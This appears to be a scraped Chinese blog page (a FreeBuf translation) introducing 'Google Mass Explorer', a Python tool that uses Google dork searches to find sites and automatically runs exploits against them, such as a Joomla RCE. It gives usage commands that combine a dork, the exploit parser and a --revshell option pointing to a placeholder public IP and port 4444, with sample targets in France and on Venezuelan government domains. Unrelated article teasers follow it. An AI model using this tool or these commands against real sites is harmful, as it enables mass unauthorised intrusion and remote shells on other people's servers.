cve 爬虫_好用的Google漏洞爬虫:Google Mass Explorer
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
这是一款基于谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制就是:先进行一次谷歌搜索,将结果解析为特定格式,然后再提供给exp使用。
大家可以尝试使用--help来列出所有参数。
这个项目笔者会持续更新,以后再添加新的exp进行升级。此外,它会利用google_parsers模块去构建exp解析搜索结果,所以当你开始搜索时,可以选择“--exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)以后还会继续优化,而现在的exp只含有joomla cve,毕竟这个项目主要是给大家自己diy使用的。但是,如果你不会弄exp,把利用exp提交给过来也行。
由于笔者平时还是比较忙,所以没有太多时间去手动搜索目标。故而,笔者尝试使用Selenium框架去造了个爬虫来搜寻测试目标。至于搜索过程中出现的Google的验证码,它需要其他库和模块来辅助解决。在项目里使用Selenium后,大家就可以在谷歌出现验证码的是时候,自行手动输入验证码,然后爬虫就可以继续爬行了。这大概是笔者能想出的最好的解决验证码防护的办法了。
简单概述下爬虫是如何工作的:1. 执行谷歌搜索
2. 从每一页解析结果
3. 测试是否结果中含有漏洞
依赖与需求
这个项目需要python3,使用requirements安装依赖库的方法如下:$ sudo pip install -r requirements.txt
运行示例:python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的例子里,笔者是在寻找法国的joomla RCE目标,使用的是google_domains.txt里面的google域名(比如google.co.uk)来作为搜索引擎,“--last_update”则代表着搜索结果的更新时间为上个月。
上面例子里的选项适用于任何语言,主要决定于google针对相应的国家给出的语法。
下面再给出一个简单的例子:python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是可以单独使用的:$ cd xpl_parsers
$ python joomla_cve_2015_8562.py
单独测试exp的方法:$ cd exploits
$ python exploiter.py --file
* 参考来源:Github,FB小编dawner编译,转载请注明来自FreeBuf(FreeBuf.COM)
cve 爬虫_好用的Google漏洞爬虫:Google Mass Explorer相关推荐
- 为什么用python写爬虫_老猿为什么写Python爬虫教程
对于"爬虫", 或许你只是听说过,或许已经有所了解.无论怎样,你可能有过这样的困惑: + 学了爬虫不知道怎么挣钱? + 技术不知道如何进阶? + 遇到问题不知道找谁交流? 十多年前 ...
- java 有没有类似于 requests 爬虫_广州地震?用 Python 爬虫带你了解地震
这周看到了两个地震新闻,一个是广东广州增城的,另一个是台湾的,因为本人身在广州,而且对于广佛这边的来说地震其实挺突然的对于我们来说,基本在广佛这边很少出现地震,所以我看到广州增城地震也挺吃惊,然后就萌 ...
- python深度爬虫_总结:常用的 Python 爬虫技巧
用python也差不多一年多了,python应用最多的场景还是web快速开发.爬虫.自动化运维:写过简单网站.写过自动发帖脚本.写过收发邮件脚本.写过简单验证码识别脚本. 爬虫在开发过程中也有很多复用 ...
- python简单网络爬虫_【Python】 简单网络爬虫实现
介绍网络爬虫(英语:网络爬虫),也称为网络蜘蛛(蜘蛛)是一个Web机器人用于自动浏览万维网.其目的通常是为了编译web索引.\u2014\u2014维基百科web爬虫程序可以节省他们访问的页面,以便搜 ...
- 手机写python爬虫_零基础开始写Python爬虫心得
零基础学习爬虫,坑确实比较多,总结如下: 1.环境配置,各种安装包.环境变量,对小白太不友好: 2.缺少合理的学习路径,上来 Python.HTML 各种学,极其容易放弃: 3.Python有很多包. ...
- 如何用python实现爬虫_如何用python实现网络爬虫原理?
对于一个网络爬虫,如果要按广度遍历的方式下载,它就是这样干活的: 1.从给定的入口网址把第一个网页下载下来 2.从第一个网页中提取出所有新的网页地址,放入下载列表中 3.按下载列表中的地址,下载所有新 ...
- java 网络爬虫_如何用Java实现网络爬虫
原标题:如何用Java实现网络爬虫 微信公众号"书圈"后台回复[Javapachong1],下载本例的PPT和源码 作品描述 本章作品是一个能够抓取指定网站ACM比赛信息的爬虫.A ...
- python极客学院爬虫_学习极客学院多线程爬虫课程的收获
昨天开始了极客学院<XPath与多线程爬虫>课程的学习,主要涉及到XPath和requests的使用,在测试过程中出现了很多问题,经过不断摸索以及前辈们的帮助,现将经验总结如下: 1. P ...
- 51自学网python爬虫_小白必看的Python爬虫流程
定义: 网络爬虫(Web Spider),又被称为网页蜘蛛,是一种按照一定的规则,自动地抓取网站信息的程序或者脚本. 简介: 网络蜘蛛是一个很形象的名字.如果把互联网比喻成一个蜘蛛网,那么Spider ...
最新文章
- iOS中的两种主要架构及其优缺点
- 计算机重启如何进入设置界面,win7电脑无法正常启动,一开机就进入到bios设置界面怎么办?...
- maven 热部署 web应用
- 使用迁移学习和TensorFlow.js在浏览器中进行AI情感检测
- VSCode 个性化配置快捷键
- 把DamnSmallLinux(DSL)安装到硬盘(虚拟机)并安装GCC
- 电子电路基础 (4)——电阻的认识
- 原生开发什么意思_原生app开发是什么意思?
- javascript 构造函数方式定义对象 (转载)
- 实践练习6:查看 OceanBase 执行计划
- No matter what,just do not give up。
- python3 英文字母单数转复数
- 如何打造3D立体世界?跟随图片一同探寻
- 方向导数(Directional derivatives)
- html个人中心样式,个人中心.html
- caffe学习笔记2:net forward与backward
- 单点登陆是什么意思?
- 宜信支付结算账户系统浅析
- 基于STM32F103的智能门锁系统
- 让你写工作总结不用愁,总结的方法套路大全
热门文章
- ASP.NET MVC 2示例Tailspin Travel UI层分析
- 记录AJAX在VS2005中的使用第二编
- PAT甲级1086 Tree Traversals Again:[C++题解]二叉树中序序列、栈、求后序遍历
- 2020年余丙森概率统计强化笔记-第一章 随机事件及其概率-第二章 一维随机变量及其分布
- 程序设计竞赛算法基础考试真题2020年(回忆版)
- IDEA打包成可执行的JAR包
- centos7 mysql安装配置_mysql 5.7.17 安装配置方法图文教程(CentOS7)
- api质量等级_第1150期 简单又易操作的辨别润滑油质量的方法
- linux指令笔试,Linux笔试常用命令
- python网页编程测试_李亚涛:python编写友情链接检测工具